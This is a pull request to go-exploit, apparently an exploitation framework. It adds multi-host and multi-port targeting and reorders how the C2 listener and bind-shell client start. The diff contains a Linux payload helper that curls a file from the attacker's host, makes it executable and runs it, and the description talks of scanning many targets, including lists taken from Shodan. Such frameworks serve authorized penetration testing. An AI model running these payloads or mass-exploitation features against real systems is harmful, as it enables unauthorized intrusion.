### PR TITLE
Initial implementation of rhosts and rports

### DIFF
--- a/cli/commandline.go
+++ b/cli/commandline.go
@@ -39,7 +39,6 @@ func commonValidate(conf *config.Config, rhosts string, rports string) bool {
 
 				return false
 			}
-			fmt.Println(portInt)
 			conf.Rports = append(conf.Rports, portInt)
 		}
 	} else {

--- a/cli/commandline.go
+++ b/cli/commandline.go
@@ -1,63 +1,68 @@
 package cli
 
 import (
-	"crypto/tls"
 	"flag"
 	"fmt"
-	"net"
 	"strconv"
-	"time"
+	"strings"
 
 	"github.com/vulncheck-oss/go-exploit/c2"
 	"github.com/vulncheck-oss/go-exploit/config"
 	"github.com/vulncheck-oss/go-exploit/output"
 )
 
-func commonValidate(conf *config.Config, determineSSL bool) bool {
+func commonValidate(conf *config.Config, rhosts string, rports string) bool {
 	valid := true
 
 	switch {
-	case len(conf.Rhost) == 0:
+	case len(conf.Rhost) == 0 && len(rhosts) == 0:
 		valid = false
-		output.PrintError("Missing required option 'rhost'")
-	case conf.Rport == 0:
+		output.PrintError("Missing required option 'rhost' or 'rhosts'")
+	case conf.Rport == 0 && len(rports) == 0:
 		valid = false
-		output.PrintError("Missing required option 'rport'")
+		output.PrintError("Missing required option 'rport' or 'rports'")
 	case !conf.DoVerify && !conf.DoVersionCheck && !conf.DoExploit:
 		valid = false
 		output.PrintError("Please provide an action (-v, -c, -e)")
-	case conf.SSL && determineSSL:
+	case conf.SSL && conf.DetermineSSL:
 		valid = false
 		output.PrintError("-a and -s are mutually exclusive")
+	}
+
+	// convert the provided Rports to a slice of int
+	if len(rports) != 0 {
+		splitPorts := strings.Split(rports, ",")
+		for _, port := range splitPorts {
+			portInt, err := strconv.Atoi(port)
+			if err != nil {
+				output.PrintfError("Failed to convert provided rports: %s", err)
+
+				return false
+			}
+			fmt.Println(portInt)
+			conf.Rports = append(conf.Rports, portInt)
+		}
+	} else {
+		conf.Rports = append(conf.Rports, conf.Rport)
+	}
+
+	if len(rhosts) != 0 {
+		splitRhosts := strings.Split(rhosts, ",")
+		conf.Rhosts = append(conf.Rhosts, splitRhosts...)
+	} else {
+		conf.Rhosts = append(conf.Rhosts, conf.Rhost)
 	}
 
 	return valid
 }
 
-// connects to the remote server and tries to determine if the server expects SSL comms
-// this is accomplished by attempting to read 5 bytes from the server and timing out
-// if it fails. This is a fair amount of overhead if done at scale, but reasonable for
-// someone that is using -a (instead of -s or nothing). This should only be slow on
-// non-ssl connections...
-func determineServerSSL(rhost string, rport int) bool {
-	conf := &tls.Config{
-		InsecureSkipVerify: true,
-	}
-
-	conn, err := tls.DialWithDialer(&net.Dialer{Timeout: 4 * time.Second}, "tcp", rhost+":"+strconv.Itoa(rport), conf)
-	if err != nil {
-		return false
-	}
-	conn.Close()
-
-	return true
-}
-
 // command line flags for defining the remote host.
-func remoteHostFlags(conf *config.Config) {
+func remoteHostFlags(conf *config.Config, rhosts *string, rports *string) {
 	flag.StringVar(&conf.Rhost, "rhost", "", "The remote target's IP address")
+	flag.StringVar(rhosts, "rhosts", "", "A comma delimited list of remote target IP addresses")
 	// the Rport should be pre-configured to have a default value (see config.go:New())
 	flag.IntVar(&conf.Rport, "rport", conf.Rport, "The remote target's server port")
+	flag.StringVar(rports, "rports", "", "A comma delimited list of the remote target's server ports")
 }
 
 // command line flags for defining the local host.
@@ -74,19 +79,20 @@ func exploitFunctionality(conf *config.Config) {
 }
 
 // command line flags that control ssl communication with the target.
-func sslFlags(conf *config.Config, determineSSL *bool) {
+func sslFlags(conf *config.Config) {
 	flag.BoolVar(&conf.SSL, "s", false, "Use https to communicate with the target")
-	flag.BoolVar(determineSSL, "a", false, "Automatically determine if the remote target uses SSL")
+	flag.BoolVar(&conf.DetermineSSL, "a", false, "Automatically determine if the remote target uses SSL")
 }
 
 // Parses the command line arguments used by RCE exploits.
 func CodeExecutionCmdLineParse(conf *config.Config) bool {
-	var determineSSL bool
+	var rhosts string
+	var rports string
 
-	remoteHostFlags(conf)
+	remoteHostFlags(conf, &rhosts, &rports)
 	localHostFlags(conf)
 	exploitFunctionality(conf)
-	sslFlags(conf, &determineSSL)
+	sslFlags(conf)
 
 	// flags unique to remote code execution
 	flag.IntVar(&conf.Bport, "bport", 0, "The port to attach the bind shell to")
@@ -122,7 +128,7 @@ func CodeExecutionCmdLineParse(conf *config.Config) bool {
 	flag.Parse()
 
 	// validate command line arguments
-	success := commonValidate(conf, determineSSL)
+	success := commonValidate(conf, rhosts, rports)
 
 	// validate a reverse shell or bind shell params are correctly specified
 	if conf.DoExploit {
@@ -154,20 +160,17 @@ func CodeExecutionCmdLineParse(conf *config.Config) bool {
 		}
 	}
 
-	if success && determineSSL {
-		conf.SSL = determineServerSSL(conf.Rhost, conf.Rport)
-	}
-
 	return success
 }
 
 func InformationDisclosureCmdLineParse(conf *config.Config) bool {
-	var determineSSL bool
+	var rhosts string
+	var rports string
 
-	remoteHostFlags(conf)
+	remoteHostFlags(conf, &rhosts, &rports)
 	localHostFlags(conf)
 	exploitFunctionality(conf)
-	sslFlags(conf, &determineSSL)
+	sslFlags(conf)
 
 	flag.Usage = func() {
 		// banner explaining what the software is
@@ -183,21 +186,17 @@ func InformationDisclosureCmdLineParse(conf *config.Config) bool {
 	flag.Parse()
 
 	// validate command line arguments
-	ok := commonValidate(conf, determineSSL)
-	if ok && determineSSL {
-		conf.SSL = determineServerSSL(conf.Rhost, conf.Rport)
-	}
-
-	return ok
+	return commonValidate(conf, rhosts, rports)
 }
 
 func WebShellCmdLineParse(conf *config.Config) bool {
-	var determineSSL bool
+	var rhosts string
+	var rports string
 
-	remoteHostFlags(conf)
+	remoteHostFlags(conf, &rhosts, &rports)
 	localHostFlags(conf)
 	exploitFunctionality(conf)
-	sslFlags(conf, &determineSSL)
+	sslFlags(conf)
 
 	flag.Usage = func() {
 		// banner explaining what the software is
@@ -213,10 +212,5 @@ func WebShellCmdLineParse(conf *config.Config) bool {
 	flag.Parse()
 
 	// validate command line arguments
-	ok := commonValidate(conf, determineSSL)
-	if ok && determineSSL {
-		conf.SSL = determineServerSSL(conf.Rhost, conf.Rport)
-	}
-
-	return ok
+	return commonValidate(conf, rhosts, rports)
 }

--- a/cli/commandline_test.go
+++ b/cli/commandline_test.go
@@ -44,18 +44,40 @@ func TestCodeExecutionCmdLineParse(t *testing.T) {
 
 func TestCommonValidate(t *testing.T) {
 	conf := config.New(config.CodeExecution, []c2.Impl{c2.SimpleShellServer}, "test product", "CVE-2023-1270", 1270)
+	var rhosts string
+	var rports string
 
-	if commonValidate(conf, false) {
+	if commonValidate(conf, rhosts, rports) {
 		t.Fatal("commonValidate should fail with an empty Rhost")
 	}
 
 	conf.Rhost = "10.9.49.99"
-	if commonValidate(conf, false) {
+	if commonValidate(conf, rhosts, rports) {
 		t.Fatal("commonValidate should fail with no supplied action")
 	}
 
 	conf.DoVerify = true
-	if !commonValidate(conf, false) {
+	if !commonValidate(conf, rhosts, rports) {
 		t.Fatal("commonValidate should succeed with rhost, rport, and doVerify")
+	}
+
+	// clear rports
+	conf.Rports = make([]int, 0)
+	if !commonValidate(conf, rhosts, "1270,1280") {
+		t.Fatal("commonValidate have succeeded")
+	}
+
+	if len(conf.Rports) != 2 || conf.Rports[0] != 1270 || conf.Rports[1] != 1280 {
+		t.Fatalf("commonValidate didn't convert the port array correctly: %d %d %d", len(conf.Rports), conf.Rports[0], conf.Rports[1])
+	}
+
+	// clear rhosts
+	conf.Rhosts = make([]string, 0)
+	if !commonValidate(conf, "127.0.0.1,127.0.0.2", rports) {
+		t.Fatal("commonValidate have succeeded")
+	}
+
+	if len(conf.Rhosts) != 2 || conf.Rhosts[0] != "127.0.0.1" || conf.Rhosts[1] != "127.0.0.2" {
+		t.Fatalf("commonValidate didn't convert the port array correctly: %d %s %s", len(conf.Rhosts), conf.Rhosts[0], conf.Rhosts[1])
 	}
 }

--- a/config/config.go
+++ b/config/config.go
@@ -29,14 +29,20 @@ type Config struct {
 	// values configured by the user
 	// target host for remote exploits
 	Rhost string
+	// a list of target hosts
+	Rhosts []string
 	// target port
 	Rport int
+	// a list of target ports
+	Rports []int
 	// local host for remote exploits
 	Lhost string
 	// local port
 	Lport int
 	// bind port
 	Bport int
+	// indicates if the framework should autodetect ssl/plain
+	DetermineSSL bool
 	// indicates if ssl is used in comms
 	SSL bool
 	// indicates if we run the target verify

--- a/examples/cve-2022-44877/cve-2022-44877.go
+++ b/examples/cve-2022-44877/cve-2022-44877.go
@@ -8,13 +8,12 @@ import (
 
 	"github.com/vulncheck-oss/go-exploit"
 	"github.com/vulncheck-oss/go-exploit/c2"
+	"github.com/vulncheck-oss/go-exploit/c2/httpservefile"
 	"github.com/vulncheck-oss/go-exploit/config"
 	"github.com/vulncheck-oss/go-exploit/output"
 	"github.com/vulncheck-oss/go-exploit/payload"
 	"github.com/vulncheck-oss/go-exploit/protocol"
 	"github.com/vulncheck-oss/go-exploit/random"
-
-	"github.com/vulncheck-oss/go-exploit/c2/httpservefile"
 )
 
 type CWPInjection struct{}

--- a/framework.go
+++ b/framework.go
@@ -3,7 +3,10 @@ package exploit
 import (
 	"crypto/tls"
 	"math/rand"
+	"net"
 	"net/http"
+	"strconv"
+	"sync"
 	"time"
 
 	"github.com/vulncheck-oss/go-exploit/c2"
@@ -27,6 +30,8 @@ type Exploit interface {
 	CheckVersion(conf *config.Config) VersionCheckType
 	RunExploit(conf *config.Config) bool
 }
+
+var globalWG sync.WaitGroup
 
 func doVerify(sploit Exploit, conf *config.Config) bool {
 	output.PrintfStatus("Validating the remote target is a %s installation", conf.Product)
@@ -63,48 +68,112 @@ func doVersionCheck(sploit Exploit, conf *config.Config) bool {
 	return true
 }
 
-func doExploit(sploit Exploit, conf *config.Config) bool {
+// connects to the remote server and tries to determine if the server expects SSL comms
+// this is accomplished by attempting to read 5 bytes from the server and timing out
+// if it fails. This is a fair amount of overhead if done at scale, but reasonable for
+// someone that is using -a (instead of -s or nothing). This should only be slow on
+// non-ssl connections...
+func determineServerSSL(rhost string, rport int) bool {
+	conf := &tls.Config{
+		InsecureSkipVerify: true,
+	}
+
+	conn, err := tls.DialWithDialer(&net.Dialer{Timeout: 5 * time.Second}, "tcp", rhost+":"+strconv.Itoa(rport), conf)
+	if err != nil {
+		return false
+	}
+	conn.Close()
+
+	return true
+}
+
+func parseCommandLine(conf *config.Config) bool {
 	switch conf.ExType {
 	case config.CodeExecution:
-		if conf.ThirdPartyC2Server {
-			// c2 will be handled by a different program
-			sploit.RunExploit(conf)
-		} else {
-			// create the requested C2 server
-			c2Impl, ok := c2.GetInstance(conf.C2Type)
-			if !ok {
-				return false
-			}
-
-			// spawn a tcp listener
-			if c2Impl == nil {
-				return false
-			}
-
-			var initSuccess bool
-			if conf.Bport != 0 {
-				// the c2 is a client
-				initSuccess = c2Impl.Init(conf.Rhost, conf.Bport, true)
-			} else {
-				// the c2 is a reverse shell
-				initSuccess = c2Impl.Init(conf.Lhost, conf.Lport, false)
-			}
-
-			if !initSuccess {
-				return false
-			}
-
-			// run exploit in goroutine
-			go sploit.RunExploit(conf)
-
-			// listen/connect depending on the c2 impl
-			c2Impl.Run(conf.C2Timeout)
-		}
+		return cli.CodeExecutionCmdLineParse(conf)
 	case config.InformationDisclosure:
-		fallthrough
+		return cli.InformationDisclosureCmdLineParse(conf)
 	case config.Webshell:
-		if !sploit.RunExploit(conf) {
-			return false
+		return cli.WebShellCmdLineParse(conf)
+	default:
+		output.PrintError("Invalid exploit type provided.")
+
+		return false
+	}
+}
+
+func startC2Server(conf *config.Config) {
+	if conf.DoExploit && conf.ExType == config.CodeExecution && !conf.ThirdPartyC2Server && conf.Bport == 0 {
+		c2Impl, success := c2.GetInstance(conf.C2Type)
+		if !success || c2Impl == nil {
+			return
+		}
+
+		success = c2Impl.Init(conf.Lhost, conf.Lport, false)
+		if !success {
+			return
+		}
+
+		globalWG.Add(1)
+		go func() {
+			defer globalWG.Done()
+			c2Impl.Run(conf.C2Timeout)
+			output.PrintStatus("C2 server exited")
+		}()
+	}
+}
+
+// execute verify, version check, and exploit. Return false if an unrecoverable error occurred.
+func doScan(sploit Exploit, conf *config.Config) bool {
+	// autodetect if the the target is using SSL or not
+	if conf.DetermineSSL {
+		conf.SSL = determineServerSSL(conf.Rhost, conf.Rport)
+	}
+
+	if conf.DoVerify {
+		if !doVerify(sploit, conf) {
+			return true
+		}
+	}
+
+	if conf.DoVersionCheck {
+		if !doVersionCheck(sploit, conf) {
+			return true
+		}
+	}
+
+	if conf.DoExploit {
+		// execute exploit attempts on a new thread
+		globalWG.Add(1)
+		go func() {
+			defer globalWG.Done()
+			ok := sploit.RunExploit(conf)
+			if ok {
+				output.PrintStatus("Exploit successfully completed")
+			} else {
+				output.PrintStatus("Exploit exited with an error")
+			}
+		}()
+
+		// if the "c2" connects to a bindshell, call init to update the rhost/bport
+		// and then attempt to connect
+		if !conf.ThirdPartyC2Server && conf.Bport != 0 {
+			c2Impl, success := c2.GetInstance(conf.C2Type)
+			if !success || c2Impl == nil {
+				return false
+			}
+
+			success = c2Impl.Init(conf.Rhost, conf.Bport, true)
+			if !success {
+				return false
+			}
+
+			globalWG.Add(1)
+			go func() {
+				defer globalWG.Done()
+				c2Impl.Run(conf.C2Timeout)
+				output.PrintStatus("C2 client exited")
+			}()
 		}
 	}
 
@@ -112,22 +181,7 @@ func doExploit(sploit Exploit, conf *config.Config) bool {
 }
 
 func RunProgram(sploit Exploit, conf *config.Config) {
-	switch conf.ExType {
-	case config.CodeExecution:
-		if !cli.CodeExecutionCmdLineParse(conf) {
-			return
-		}
-	case config.InformationDisclosure:
-		if !cli.InformationDisclosureCmdLineParse(conf) {
-			return
-		}
-	case config.Webshell:
-		if !cli.WebShellCmdLineParse(conf) {
-			return
-		}
-	default:
-		output.PrintError("Invalid exploit type provided.")
-
+	if !parseCommandLine(conf) {
 		return
 	}
 
@@ -137,21 +191,20 @@ func RunProgram(sploit Exploit, conf *config.Config) {
 	// disable https cert verification globally
 	http.DefaultTransport.(*http.Transport).TLSClientConfig = &tls.Config{InsecureSkipVerify: true}
 
-	if conf.DoVerify {
-		if !doVerify(sploit, conf) {
-			return
-		}
-	}
+	// if the c2 server catches responses, initialize and start so it can bind
+	startC2Server(conf)
 
-	if conf.DoVersionCheck {
-		if !doVersionCheck(sploit, conf) {
-			return
-		}
-	}
+	// loop over all the provided host / port combos
+	for hindex, host := range conf.Rhosts {
+		conf.Rhost = host
+		for pindex, port := range conf.Rports {
+			conf.Rport = port
+			output.PrintfStatus("Starting target %d: %s:%d", hindex+pindex, conf.Rhost, conf.Rport)
 
-	if conf.DoExploit {
-		if !doExploit(sploit, conf) {
-			return
+			if !doScan(sploit, conf) {
+				return
+			}
+			globalWG.Wait()
 		}
 	}
 }

--- a/framework.go
+++ b/framework.go
@@ -195,16 +195,18 @@ func RunProgram(sploit Exploit, conf *config.Config) {
 	startC2Server(conf)
 
 	// loop over all the provided host / port combos
-	for hindex, host := range conf.Rhosts {
+	hostIndex := 0
+	for _, host := range conf.Rhosts {
 		conf.Rhost = host
-		for pindex, port := range conf.Rports {
+		for _, port := range conf.Rports {
 			conf.Rport = port
-			output.PrintfStatus("Starting target %d: %s:%d", hindex+pindex, conf.Rhost, conf.Rport)
+			output.PrintfStatus("Starting target %d: %s:%d", hostIndex, conf.Rhost, conf.Rport)
 
 			if !doScan(sploit, conf) {
 				return
 			}
 			globalWG.Wait()
+			hostIndex++
 		}
 	}
 }

--- a/payload/download.go
+++ b/payload/download.go
@@ -9,7 +9,8 @@ import (
 func LinuxCurlHTTPDownloadAndExecute(lhost string, lport int, downloadFile string) string {
 	output := "/tmp/" + random.RandLetters(3)
 
-	return fmt.Sprintf("curl -so %s http://%s:%d/%s && chmod +x %s && %s & rm -f %s", output, lhost, lport, downloadFile, output, output, output)
+	return fmt.Sprintf("curl -so %s http://%s:%d/%s && chmod +x %s && %s & rm -f %s", output, lhost,
+		lport, downloadFile, output, output, output)
 }
 
 func WindowsCurlHTTPDownloadAndExecute(lhost string, lport int, downloadFile string) string {

--- a/payload/download.go
+++ b/payload/download.go
@@ -9,8 +9,8 @@ import (
 func LinuxCurlHTTPDownloadAndExecute(lhost string, lport int, downloadFile string) string {
 	output := "/tmp/" + random.RandLetters(3)
 
-	return fmt.Sprintf("curl -so %s http://%s:%d/%s && chmod +x %s && %s & rm -f %s", output, lhost,
-		lport, downloadFile, output, output, output)
+	return fmt.Sprintf("curl -so %s http://%s:%d/%s && chmod +x %s && %s & rm -f %s",
+		output, lhost, lport, downloadFile, output, output, output)
 }
 
 func WindowsCurlHTTPDownloadAndExecute(lhost string, lport int, downloadFile string) string {


### PR DESCRIPTION
This addresses #13 and #16 by adding logic to handle `rhosts` and `rports`.  In this implementation, the user can specify a comma delimited list of hosts or ports to hit multiple targets.  The only real challenge here was reordering how c2 is started / used since a reverse shell catcher can be started once, but a bind shell connector needs to restarted over and over again. I think the logic I've introduced is fine.

An example of validating remote targets as Webmin (the output is a little clubbered together at the moment, suggestions on improvements welcome):

```sh
albinolobster@mournland:~/go-exploit/examples/cve-2019-15107$ ./cve-2019-15107 -rhosts 10.9.49.174,10.9.49.205 -rports 80,10000 -a -v
[*] Starting target 0: 10.9.49.174:80
[*] Validating the remote target is a Webmin installation
[-] HTTP request error: Get "http://10.9.49.174:80/": dial tcp 10.9.49.174:80: connect: connection refused
[-] The target isn't recognized as Webmin, quitting
[*] Starting target 1: 10.9.49.174:10000
[*] Validating the remote target is a Webmin installation
[+] Target validation succeeded!
[*] Starting target 2: 10.9.49.205:80
[*] Validating the remote target is a Webmin installation
[-] The HTTP header doesn't appear to be Webmin
[-] The target isn't recognized as Webmin, quitting
[*] Starting target 3: 10.9.49.205:10000
[*] Validating the remote target is a Webmin installation
[-] HTTP request error: Get "http://10.9.49.205:10000/": dial tcp 10.9.49.205:10000: connect: connection refused
[-] The target isn't recognized as Webmin, quitting
```

Above, you see the user provides two hosts and two ports. `go-exploit` loops through all four targets. This feature makes the exploits much easier to use at scale. Although there are a couple additional features that would be useful beyond this first cut:

1. Port Ranges (e.g. 80-120)
2. CIDR 172.16.0.0/24
3. Host/port from a file (e.g. the targets came from shodan).


